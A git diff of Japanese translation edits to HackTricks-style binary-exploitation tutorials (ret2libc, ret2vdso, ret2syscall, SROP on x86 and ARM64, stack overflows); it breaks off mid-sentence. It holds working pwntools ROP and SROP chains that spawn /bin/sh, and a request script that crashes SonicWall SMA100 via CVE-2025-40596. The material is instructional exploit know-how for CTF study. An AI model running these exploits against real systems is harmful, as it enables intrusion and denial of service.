**libcライブラリ**への**パス**を指定することで、残りの**エクスプロイトは自動的に計算されます**。 @@ -195,10 +196,10 @@ if libc != "": libc.address = leak - libc.symbols[func_name] #Save libc base log.info("libc base @ %s" % hex(libc.address)) ``` -> [!NOTE] -> 最終的なlibcベースアドレスは**00で終わる必要があります**。そうでない場合は、間違ったライブラリを漏洩した可能性があります。 +> [!TIP] +> **最終的なlibcベースアドレスは00で終わる必要があります**。そうでない場合は、間違ったライブラリが漏洩した可能性があります。 -その後、関数`system`のアドレスと文字列_"/bin/sh"_の**アドレス**は、**libcのベースアドレス**から**計算**され、**libcライブラリ**が与えられます。 +次に、関数`system`のアドレスと文字列_"/bin/sh"_の**アドレス**は、**libc**の**ベースアドレス**から**計算**され、**libcライブラリ**が与えられます。 ```python BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh SYSTEM = libc.sym["system"] @@ -207,7 +208,7 @@ EXIT = libc.sym["exit"] log.info("bin/sh %s " % hex(BINSH)) log.info("system %s " % hex(SYSTEM)) ``` -最終的に、/bin/sh 実行エクスプロイトが準備されます: +最終的に、/bin/sh 実行エクスプロイトが準備されます。 ```python rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT) @@ -218,7 +219,7 @@ p.sendline(rop2) p.interactive() #Interact with the conenction ``` 最後のROPについて説明しましょう。\ -最後のROP(`rop1`)は再びmain関数を呼び出し、次に**再度****オーバーフロー**を**悪用**します(だから`OFFSET`がここに再びあります)。次に、`POP_RDI`を呼び出して**"/bin/sh"**の**アドレス**(`BINSH`)を指し、**system**関数(`SYSTEM`)を呼び出します。なぜなら、**"/bin/sh"**のアドレスがパラメータとして渡されるからです。\ +最後のROP(`rop1`)は再びmain関数を呼び出し、次に**overflow**を**再利用**することができます(だから`OFFSET`がここに再びあります)。次に、`POP_RDI`を呼び出し、**"/bin/sh"**の**アドレス**(`BINSH`)を指し、**system**関数(`SYSTEM`)を呼び出します。なぜなら、**"/bin/sh"**のアドレスがパラメータとして渡されるからです。\ 最後に、**exit関数のアドレス**が**呼び出され**、プロセスが**正常に終了**し、アラートが生成されません。 **この方法で、エクスプロイトは_/bin/sh_シェルを実行します。** @@ -228,7 +229,7 @@ p.interactive() #Interact with the conenction ## 4(2)- ONE_GADGETの使用 **system**と**"/bin/sh"**を使用する代わりに、[**ONE_GADGET**](https://github.com/david942j/one_gadget)を使用してシェルを取得することもできます。**ONE_GADGET**はlibcライブラリ内で、1つの**ROPアドレス**を使用してシェルを取得する方法を見つけます。\ -ただし、通常はいくつかの制約があり、最も一般的で回避しやすいものは`[rsp+0x30] == NULL`のようなものです。**RSP**内の値を制御しているので、制約を回避するためにもう少しNULL値を送信するだけです。 +ただし、通常はいくつかの制約があり、最も一般的で回避しやすいものは`[rsp+0x30] == NULL`です。**RSP**内の値を制御しているので、制約を回避するためにもう少しNULL値を送信するだけです。 ![](<../../../../images/image (754).png>) ```python @@ -237,7 +238,8 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100 ``` ## EXPLOIT FILE -この脆弱性を悪用するためのテンプレートはここにあります: +この脆弱性を悪用するためのテンプレートはここにあります: + {{#ref}} rop-leaking-libc-template.md @@ -247,7 +249,7 @@ rop-leaking-libc-template.md ### MAIN_PLT = elf.symbols\['main'] が見つかりません -"main" シンボルが存在しない場合、メインコードの場所を見つけることができます: +"main" シンボルが存在しない場合、メインコードの場所を見つけることができます: ```python objdump -d vuln_binary | grep "\.text" Disassembly of section .text: diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md index 056074f0d..312d14f9a 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md @@ -6,7 +6,7 @@ **vDSO領域にガジェットが存在する可能性があります**。これはユーザーモードからカーネルモードに切り替えるために使用されます。この種のチャレンジでは、通常、vDSO領域をダンプするためにカーネルイメージが提供されます。 -[https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/)の例に従って、vdsoセクションをダンプし、ホストに移動する方法を見ることができます。 +[https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/) の例に従うと、vdsoセクションをダンプしてホストに移動する方法がわかります。 ```bash # Find addresses cat /proc/76/maps @@ -52,11 +52,12 @@ or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd ``` > [!CAUTION] -> したがって、**vdsoを悪用してASLRをバイパスする**ことが可能であるかもしれないことに注意してください。カーネルがCONFIG_COMPAT_VDSOでコンパイルされている場合、vdsoアドレスはランダム化されません: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639) +> したがって、**vdsoを悪用してASLRをバイパスする**ことが可能である理由に注意してください。カーネルがCONFIG_COMPAT_VDSOでコンパイルされている場合、vdsoアドレスはランダム化されません: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639) ### ARM64 -kali 2023.2 arm64でバイナリのvdsoセクションをダンプして確認したところ、スタックの値からレジスタを制御したり、retのためにx30を制御したりするための興味深いガジェットは見つかりませんでした**SROPを呼び出す方法を除いて**。ページの例からの詳細を確認してください: +kali 2023.2 arm64でバイナリのvdsoセクションをダンプして確認したところ、スタックの値からレジスタを制御したり、retのためにx30を制御する方法は見つかりませんでした**SROPを呼び出す方法を除いて**。ページの例からの詳細を確認してください: + {{#ref}} srop-sigreturn-oriented-programming/srop-arm64.md diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md index f2306d8b0..2f215b36b 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md @@ -4,16 +4,16 @@ ## 基本情報 -これはRet2libに似ていますが、この場合はライブラリから関数を呼び出すことはありません。この場合、すべては`sys_execve`システムコールを引数付きで呼び出し、`/bin/sh`を実行するために準備されます。この技術は通常、静的にコンパイルされたバイナリで実行されるため、多くのガジェットやシステムコール命令が存在する可能性があります。 +これはRet2libに似ていますが、この場合はライブラリから関数を呼び出すことはありません。この場合、`sys_execve`システムコールを呼び出すために、いくつかの引数を準備します。これにより、`/bin/sh`を実行します。この技術は通常、静的にコンパイルされたバイナリで行われるため、多くのガジェットやシステムコール命令が存在する可能性があります。 -**syscall**の呼び出しを準備するためには、以下の設定が必要です: +**syscall**の呼び出しを準備するためには、次の構成が必要です: - `rax: 59 sys_execveを指定` - `rdi: "/bin/sh"へのポインタ、実行するファイルを指定` - `rsi: 0、引数は渡さないことを指定` - `rdx: 0、環境変数は渡さないことを指定` -基本的に、`/bin/sh`という文字列をどこかに書き込み、その後`syscall`を実行する必要があります(スタックを制御するために必要なパディングに注意)。これには、`/bin/sh`を既知の領域に書き込むためのガジェットが必要です。 +基本的には、`/bin/sh`という文字列をどこかに書き込み、その後`syscall`を実行する必要があります(スタックを制御するために必要なパディングに注意してください)。これには、`/bin/sh`を既知の領域に書き込むためのガジェットが必要です。 > [!TIP] > 呼び出すのに興味深い別のシステムコールは**`mprotect`**で、これにより攻撃者は**メモリ内のページの権限を変更する**ことができます。これは[**ret2shellcode**](../../stack-overflow/stack-shellcode/index.html)と組み合わせることができます。 @@ -28,7 +28,7 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret" 0x00000000004101f3 : pop rsi ; ret 0x00000000004498b5 : pop rdx ; ret ``` -これらのアドレスを使用すると、**スタックの内容を書き込み、レジスタにロードする**ことが可能です。 +これらのアドレスを使用すると、**スタックに内容を書き込み、それをレジスタにロードする**ことができます。 ## 文字列の書き込み @@ -96,7 +96,7 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx ``` ## ガジェットが不足している場合 -もし**ガジェットが不足している**場合、例えばメモリに`/bin/sh`を書き込むために、スタックからすべてのレジスタ値(RIPやパラメータレジスタを含む)を制御するために**SROP技術を使用することができます**: +もし**ガジェットが不足している**場合、例えばメモリに`/bin/sh`を書き込むために、スタックからすべてのレジスタ値(RIPやパラメータレジスタを含む)を制御するために**SROP技術**を使用できます: {{#ref}} ../srop-sigreturn-oriented-programming/ @@ -172,10 +172,10 @@ target.interactive() ## その他の例と参考文献 - [https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html) -- 64ビット、PIEなし、nx、メモリに`execve`を呼び出すROPを書き、そこにジャンプします。 +- 64ビット、PIEなし、nx、メモリにROPを書き込み、`execve`を呼び出してそこにジャンプします。 - [https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html) -- 64ビット、nx、PIEなし、メモリに`execve`を呼び出すROPを書き、そこにジャンプします。スタックに数学的操作を行う関数を書き込むために悪用されます。 +- 64ビット、nx、PIEなし、メモリにROPを書き込み、`execve`を呼び出してそこにジャンプします。スタックに数学的操作を行う関数を書き込むために悪用されます。 - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html) -- 64ビット、PIEなし、nx、BFカナリア、メモリに`execve`を呼び出すROPを書き、そこにジャンプします。 +- 64ビット、PIEなし、nx、BFカナリア、メモリにROPを書き込み、`execve`を呼び出してそこにジャンプします。 {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md index 8c549d3e5..17e6f6867 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md @@ -2,7 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -arm64の紹介は以下を参照してください: +arm64の紹介を見つけるには: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md @@ -10,7 +11,8 @@ arm64の紹介は以下を参照してください: ## コード -私たちはページからの例を使用します: +次のページの例を使用します: + {{#ref}} ../../stack-overflow/ret2win/ret2win-arm64.md @@ -63,10 +65,10 @@ nop ; mov x8, #0xdd ; svc #0 ``` -前のガジェットを使用することで、スタックから必要なすべてのレジスタを制御し、x5を使用して2番目のガジェットにジャンプしてsyscallを呼び出すことができます。 +スタックから必要なすべてのレジスタを制御できる前のガジェットを使用し、x5を使用して2番目のガジェットにジャンプしてsyscallを呼び出します。 > [!TIP] -> libcライブラリからこの情報を知ることでret2libc攻撃を行うことも可能ですが、今回はこの例のために使用しましょう。 +> libcライブラリからこの情報を知ることは、ret2libc攻撃を行うことも可能にしますが、今回はこの例のために使用しましょう。 ### エクスプロイト ```python diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 6efdefc8c..d6ec971ca 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md @@ -8,7 +8,7 @@ シグナルハンドラが終了した後、プログラムは何も起こらなかったかのように **以前の状態に戻る** 必要があります。ここで **`sigreturn`** が登場します。これは、プログラムが **シグナルハンドラから戻る** のを助け、シグナルハンドラによって使用されたスタックフレーム(関数呼び出しやローカル変数を格納するメモリのセクション)をクリーンアップすることでプログラムの状態を復元します。 -興味深いのは、**`sigreturn`** がプログラムの状態をどのように復元するかです:それは **すべてのCPUのレジスタ値をスタックに保存することによって** 行います。シグナルがもはやブロックされていないとき、**`sigreturn` はこれらの値をスタックからポップし**、実質的にCPUのレジスタをシグナルが処理される前の状態にリセットします。これには、スタックの現在のトップを指すスタックポインタレジスタ(RSP)が含まれます。 +興味深いのは、**`sigreturn`** がプログラムの状態をどのように復元するかです:それは **すべてのCPUのレジスタ値をスタックに保存することによって** 行います。シグナルがもはやブロックされていないとき、**`sigreturn` はこれらの値をスタックからポップし、** 実質的にCPUのレジスタをシグナルが処理される前の状態にリセットします。これには、現在のスタックのトップを指すスタックポインタレジスタ(RSP)が含まれます。 > [!CAUTION] > ROPチェーンから **`sigreturn`** syscall を呼び出し、**スタックにロードしたいレジスタ値を追加する** ことで、すべてのレジスタ値を **制御** し、したがって例えば `execve` syscall を `/bin/sh` で **呼び出す** ことが可能です。 @@ -55,7 +55,7 @@ | __reserved | sigmask | +--------------------+--------------------+ ``` -より良い説明のために、こちらも確認してください: +より良い説明については、こちらも確認してください: {{#ref}} https://youtu.be/ADULSwnQs-s?feature=shared @@ -63,7 +63,7 @@ https://youtu.be/ADULSwnQs-s?feature=shared ## 例 -[**こちらに例があります**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop) では、ROPを介してsigneturnへの呼び出しが構築されており(rxaに値`0xf`を入れる)、これはそこからの最終的なエクスプロイトです: +[**ここに例があります**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop) ここでは、ROPを介してsigneturnへの呼び出しが構築されており(rxaに値`0xf`を入れています)、これはそこからの最終的なエクスプロイトです: ```python from pwn import * @@ -128,13 +128,13 @@ target.interactive() - [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared) - [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop) - [https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html) -- **スタックに書き込む**ことを可能にし、その後**`sigreturn`**システムコールを呼び出すアセンブリバイナリ。**sigreturn**構造体を介してスタックに[**ret2syscall**](../rop-syscall-execv/index.html)を書き込み、バイナリのメモリ内にあるフラグを読み取ることが可能です。 +- **スタックに書き込む**ことを可能にし、その後**`sigreturn`**システムコールを呼び出すアセンブリバイナリ。スタックに[**ret2syscall**](../rop-syscall-execv/index.html)を**sigreturn**構造体を介して書き込み、バイナリのメモリ内にあるフラグを読み取ることが可能です。 - [https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html) -- **スタックに書き込む**ことを可能にし、その後**`sigreturn`**システムコールを呼び出すアセンブリバイナリ。**sigreturn**構造体を介してスタックに[**ret2syscall**](../rop-syscall-execv/index.html)を書き込むことが可能です(バイナリには`/bin/sh`という文字列があります)。 +- **スタックに書き込む**ことを可能にし、その後**`sigreturn`**システムコールを呼び出すアセンブリバイナリ。スタックに[**ret2syscall**](../rop-syscall-execv/index.html)を**sigreturn**構造体を介して書き込むことが可能です(バイナリには`/bin/sh`という文字列があります)。 - [https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html) -- 64ビット、relroなし、canaryなし、nx、pieなし。ガジェットが不足している`gets`関数を悪用したシンプルなバッファオーバーフローで[**ret2syscall**](../rop-syscall-execv/index.html)を実行します。ROPチェーンは`gets`を再度呼び出すことで`/bin/sh`を`.bss`に書き込み、**`alarm`**関数を悪用してeaxを`0xf`に設定し、**SROP**を呼び出してシェルを実行します。 +- 64ビット、relroなし、カナリアなし、nx、pieなし。`gets`関数のバッファオーバーフローを利用し、[**ret2syscall**](../rop-syscall-execv/index.html)を実行するためのガジェットが不足しています。ROPチェーンは`/bin/sh`を`.bss`に書き込み、再度getsを呼び出し、**`alarm`**関数を利用してeaxを`0xf`に設定し、**SROP**を呼び出してシェルを実行します。 - [https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html) -- 64ビットアセンブリプログラム、relroなし、canaryなし、nx、pieなし。フローはスタックに書き込み、いくつかのレジスタを制御し、システムコールを呼び出し、その後`exit`を呼び出すことを可能にします。選択されたシステムコールは`sigreturn`で、レジスタを設定し、`eip`を以前のシステムコール命令を呼び出すように移動させ、バイナリ空間を`rwx`に設定するために`memprotect`を実行します。フローに従って、プログラムは再びESPに読み込むことを呼び出しますが、この場合ESPは次の命令を指しているため、シェルコードを渡すことで次の命令として書き込まれ、実行されます。 +- 64ビットアセンブリプログラム、relroなし、カナリアなし、nx、pieなし。フローはスタックに書き込み、いくつかのレジスタを制御し、システムコールを呼び出し、その後`exit`を呼び出すことを可能にします。選択されたシステムコールは`sigreturn`で、レジスタを設定し、`eip`を以前のシステムコール命令を呼び出すように移動させ、バイナリ空間を`rwx`に設定するために`memprotect`を実行し、バイナリ空間内のESPを設定します。フローに従って、プログラムは再度ESPに読み込みを呼び出しますが、この場合ESPは次の命令を指しているため、シェルコードを次の命令として書き込み、実行します。 - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection) - SROPは、シェルコードが配置された場所に実行権限(memprotect)を与えるために使用されます。 diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index 24d9987b2..72669b5ac 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -74,7 +74,7 @@ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR ``` ## エクスプロイト -このエクスプロイトは、bofを悪用して**`sigreturn`**への呼び出しに戻り、スタックを準備して**`execve`**を呼び出すために`/bin/sh`へのポインタを使用します。 +このエクスプロイトは、bofを悪用して**`sigreturn`**への呼び出しに戻り、スタックを準備して**`execve`**を呼び出すために`/bin/sh`へのポインタを用意します。 ```python from pwn import * @@ -132,11 +132,11 @@ return 0; ``` ## Exploit -In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**: +セクション **`vdso`** では、オフセット **`0x7b0`** に **`sigreturn`** への呼び出しを見つけることができます:
-したがって、漏洩した場合、バイナリがそれをロードしていない場合は、このアドレスを使用して `sigreturn` にアクセスすることが可能です: +したがって、漏洩した場合、バイナリがそれをロードしていない場合は **このアドレスを使用して `sigreturn` にアクセスすることが可能です**: ```python from pwn import * @@ -165,7 +165,7 @@ payload += bytes(frame) p.sendline(payload) p.interactive() ``` -より多くの情報はvdsoについては次を確認してください: +より多くの情報はvdsoについては以下を確認してください: {{#ref}} ../ret2vdso.md @@ -179,9 +179,9 @@ p.interactive() --- -## `sigreturn`ガジェットを自動的に見つける (2023-2025) +## `sigreturn`ガジェットの自動発見 (2023-2025) -最新のディストリビューションでは、`sigreturn`トランポリンは依然として**vDSO**ページによってエクスポートされていますが、正確なオフセットはカーネルのバージョンやBTI(`+branch-protection`)やPACなどのビルドフラグによって異なる場合があります。その発見を自動化することで、オフセットをハードコーディングすることを防ぎます: +最新のディストリビューションでは、`sigreturn`トランポリンは依然として**vDSO**ページによってエクスポートされていますが、正確なオフセットはカーネルのバージョンやBTI(`+branch-protection`)やPACなどのビルドフラグによって異なる場合があります。その発見を自動化することで、オフセットのハードコーディングを防ぎます: ```bash # With ROPgadget ≥ 7.4 python3 -m ROPGadget --binary /proc/$(pgrep srop)/mem --only "svc #0" 2>/dev/null | grep -i sigreturn @@ -193,7 +193,7 @@ rp++ -f ./binary --unique -r | grep "mov\s\+x8, #0x8b" # 0x8b = __NR_rt_sigret > 注: バイナリが**BTI**でコンパイルされると、すべての有効な間接分岐ターゲットの最初の命令は`bti c`になります。 リンカーによって配置された`sigreturn`トランポリンには、正しいBTIランディングパッドがすでに含まれているため、ガジェットは特権のないコードからも使用可能です。 -## ROPとのSROPのチェイニング(`mprotect`経由のピボット) +## ROPとのSROPのチェイニング(`mprotect`を介したピボット) `rt_sigreturn`は、*すべての*汎用レジスタと`pstate`を制御することを可能にします。 x86の一般的なパターンは次のとおりです: 1) SROPを使用して`mprotect`を呼び出す、2) シェルコードを含む新しい実行可能スタックにピボットする。 同じアイデアがARM64でも機能します: ```python @@ -215,9 +215,9 @@ Linux 5.16 はユーザースペースのシグナルフレームの厳格な検 * `struct rt_sigframe` の予約語はゼロでなければなりません。 * *extra_context* レコード内のすべてのポインタは整列されており、ユーザーアドレス空間内を指している必要があります。 -`pwntools>=4.10` は準拠したフレームを自動的に作成しますが、手動で構築する場合は *reserved* をゼロ初期化し、本当に必要でない限り SVE レコードを省略してください。そうしないと、`rt_sigreturn` は戻るのではなく `SIGSEGV` を返します。 +`pwntools>=4.10` は準拠したフレームを自動的に作成しますが、手動で構築する場合は、*reserved* をゼロ初期化し、本当に必要でない限り SVE レコードを省略することを確認してください。そうしないと、`rt_sigreturn` は戻るのではなく `SIGSEGV` を返します。 -主流の Android 14 および Fedora 38 から、ユーランドはデフォルトで **PAC** (*Pointer Authentication*) と **BTI** が有効な状態でコンパイルされます(`-mbranch-protection=standard`)。*SROP* 自体は影響を受けません。なぜなら、カーネルは作成されたフレームから直接 `PC` を上書きし、スタックに保存された認証された LR をバイパスするからです。しかし、間接分岐を行う **その後の ROP チェーン** は、BTI 対応の命令または PAC されたアドレスにジャンプする必要があります。そのことを考慮してガジェットを選択してください。 +主流の Android 14 および Fedora 38 から、ユーザーランドはデフォルトで **PAC** (*Pointer Authentication*) と **BTI** が有効な状態でコンパイルされます(`-mbranch-protection=standard`)。*SROP* 自体は影響を受けません。なぜなら、カーネルは作成されたフレームから直接 `PC` を上書きし、スタックに保存された認証された LR をバイパスするからです。しかし、間接分岐を行う **その後の ROP チェーン** は、BTI 対応の命令または PAC されたアドレスにジャンプする必要があります。ガジェットを選択する際にはその点を考慮してください。 ARMv8.9 で導入されたシャドウコールスタック(すでに ChromeOS 1.27+ で有効)はコンパイラレベルの緩和策であり、SROP には干渉しません。なぜなら、戻り命令は実行されず、制御の流れはカーネルによって転送されるからです。 diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md index fbae47970..cf95e974a 100644 --- a/src/binary-exploitation/stack-overflow/README.md +++ b/src/binary-exploitation/stack-overflow/README.md @@ -4,13 +4,13 @@ ## What is a Stack Overflow -**スタックオーバーフロー**は、プログラムがスタックに割り当てられたよりも多くのデータを書き込むときに発生する脆弱性です。この余分なデータは**隣接するメモリ空間を上書き**し、有効なデータの破損、制御フローの混乱、そして潜在的には悪意のあるコードの実行を引き起こします。この問題は、入力に対して境界チェックを行わない安全でない関数の使用によってしばしば発生します。 +**スタックオーバーフロー**は、プログラムがスタックに割り当てられたよりも多くのデータを書き込むときに発生する脆弱性です。この余分なデータは**隣接するメモリ空間を上書き**し、正当なデータの破損、制御フローの混乱、そして潜在的には悪意のあるコードの実行を引き起こします。この問題は、入力に対して境界チェックを行わない安全でない関数の使用によってしばしば発生します。 この上書きの主な問題は、**保存された命令ポインタ (EIP/RIP)** と**保存されたベースポインタ (EBP/RBP)** が前の関数に戻るために**スタックに保存されている**ことです。したがって、攻撃者はそれらを上書きし、**プログラムの実行フローを制御**できるようになります。 -この脆弱性は通常、関数が**スタックに割り当てられたバイト数よりも多くのバイトをコピーする**ために発生し、したがってスタックの他の部分を上書きできるようになります。 +この脆弱性は通常、関数が**スタックに割り当てられたバイト数よりも多くのバイトをコピーする**ために発生し、他のスタックの部分を上書きできるようになります。 -この脆弱性に対して一般的な関数には、**`strcpy`, `strcat`, `sprintf`, `gets`**などがあります。また、**`fgets`**、**`read` & `memcpy`**のような**長さ引数**を取る関数も、指定された長さが割り当てられたものより大きい場合に脆弱な方法で使用される可能性があります。 +この脆弱性に対して一般的な関数には、**`strcpy`, `strcat`, `sprintf`, `gets`**などがあります。また、**`fgets`**、**`read` & `memcpy`**のように**長さ引数**を取る関数も、指定された長さが割り当てられたものより大きい場合に脆弱な方法で使用される可能性があります。 例えば、以下の関数は脆弱である可能性があります: ```c @@ -23,9 +23,9 @@ printf("You entered: %s\n", buffer); ``` ### スタックオーバーフローのオフセットを見つける -スタックオーバーフローを見つける最も一般的な方法は、非常に大きな入力の `A`s を与えることです(例: `python3 -c 'print("A"*1000)'`)そして、**アドレス `0x41414141` にアクセスしようとしたことを示す `Segmentation Fault`** を期待します。 +スタックオーバーフローを見つける最も一般的な方法は、非常に大きな入力の `A`s を与えることです(例: `python3 -c 'print("A"*1000)'`)そして、**アドレス `0x41414141` にアクセスしようとしたことを示す `Segmentation Fault` を期待します**。 -さらに、スタックオーバーフローの脆弱性があることがわかったら、**リターンアドレスを上書きするために必要なオフセット**を見つける必要があります。そのために通常は **De Bruijn シーケンス** が使用されます。これは、サイズ _k_ のアルファベットと長さ _n_ の部分列に対して、**長さ _n_ のすべての可能な部分列がちょうど一度だけ連続した部分列として現れる循環シーケンス**です。 +さらに、スタックオーバーフローの脆弱性があることがわかったら、**リターンアドレスを上書きするために必要なオフセットを見つける必要があります**。これには通常、**De Bruijn シーケンス**が使用されます。これは、サイズ _k_ のアルファベットと長さ _n_ の部分列に対して、**長さ _n_ のすべての可能な部分列がちょうど一度だけ連続した部分列として現れる循環シーケンス**です。 この方法により、手動で EIP を制御するために必要なオフセットを特定する代わりに、これらのシーケンスの1つをパディングとして使用し、上書きされたバイトのオフセットを見つけることが可能です。 @@ -57,7 +57,7 @@ pattern search $rsp #Search the offset given the content of $rsp ### Ret2win -この種のCTFチャレンジでは、バイナリ内に**決して呼び出されない****関数**があり、**勝つために呼び出す必要があります**。これらのチャレンジでは、**戻りアドレスを上書きするオフセット**を見つけ、呼び出す**関数のアドレス**を見つけるだけで済みます(通常、[**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)は無効になります)ので、脆弱な関数が戻ると、隠れた関数が呼び出されます: +この種のCTFチャレンジでは、バイナリ内に**決して呼び出されない****関数**があり、**勝つためにはその関数を呼び出す必要があります**。これらのチャレンジでは、**戻りアドレスを上書きするオフセットを見つけ**、呼び出す**関数のアドレスを見つける**だけで済みます(通常、[**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)は無効になります)ので、脆弱な関数が戻ると、隠れた関数が呼び出されます: {{#ref}} ret2win/ @@ -73,7 +73,7 @@ stack-shellcode/ ### ROP & Ret2... テクニック -このテクニックは、前のテクニックの主要な保護を回避するための基本的なフレームワークです:**実行可能なスタックなし(NX)**。これにより、バイナリ内の既存の命令を悪用して任意のコマンドを実行する他のいくつかのテクニック(ret2lib、ret2syscallなど)を実行することが可能になります: +このテクニックは、前述のテクニックの主要な保護を回避するための基本的なフレームワークです:**実行可能なスタックなし(NX)**。これにより、バイナリ内の既存の命令を悪用して任意のコマンドを実行する他のいくつかのテクニック(ret2lib、ret2syscallなど)を実行することが可能になります: {{#ref}} ../rop-return-oriented-programing/ @@ -95,9 +95,9 @@ stack-shellcode/ ../common-binary-protections-and-bypasses/ {{#endref}} -### 実世界の例:CVE-2025-40596 (SonicWall SMA100) +### 実世界の例: CVE-2025-40596 (SonicWall SMA100) -**`sscanf`は信頼できない入力の解析に決して信頼されるべきではない**理由の良いデモが、2025年にSonicWallのSMA100 SSL-VPNアプライアンスで現れました。\ +**`sscanf`が信頼できない入力の解析に決して使用されるべきではない理由**の良いデモが、2025年にSonicWallのSMA100 SSL-VPNアプライアンスで発生しました。\ `/usr/src/EasyAccess/bin/httpd`内の脆弱なルーチンは、`/__api__/`で始まる任意のURIからバージョンとエンドポイントを抽出しようとします。 ```c char version[3]; @@ -116,14 +116,14 @@ warnings.filterwarnings('ignore') url = "https://TARGET/__api__/v1/" + "A"*3000 requests.get(url, verify=False) ``` -スタックカナリアはプロセスを中止させますが、攻撃者は依然として**サービス拒否**のプリミティブを得ます(さらに情報漏洩があれば、コード実行も可能です)。教訓はシンプルです: +スタックカナリアがプロセスを中止させるにもかかわらず、攻撃者は依然として**サービス拒否**のプリミティブを得る(さらに情報漏洩があれば、コード実行も可能)。教訓はシンプルです: -* 常に**最大フィールド幅**を指定してください(例:`%511s`)。 -* `snprintf`/`strncpy_s`のような安全な代替手段を好んで使用してください。 +* 常に**最大フィールド幅**を指定する(例:`%511s`)。 +* `snprintf`/`strncpy_s`のような安全な代替手段を好む。 -### 実世界の例: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server) +### 実世界の例:CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server) -NVIDIAのTriton Inference Server(≤ v25.06)には、HTTP APIを通じて到達可能な複数の**スタックベースのオーバーフロー**が含まれていました。脆弱なパターンは`http_server.cc`と`sagemaker_server.cc`に繰り返し現れました: +NVIDIAのTriton Inference Server (≤ v25.06) には、HTTP 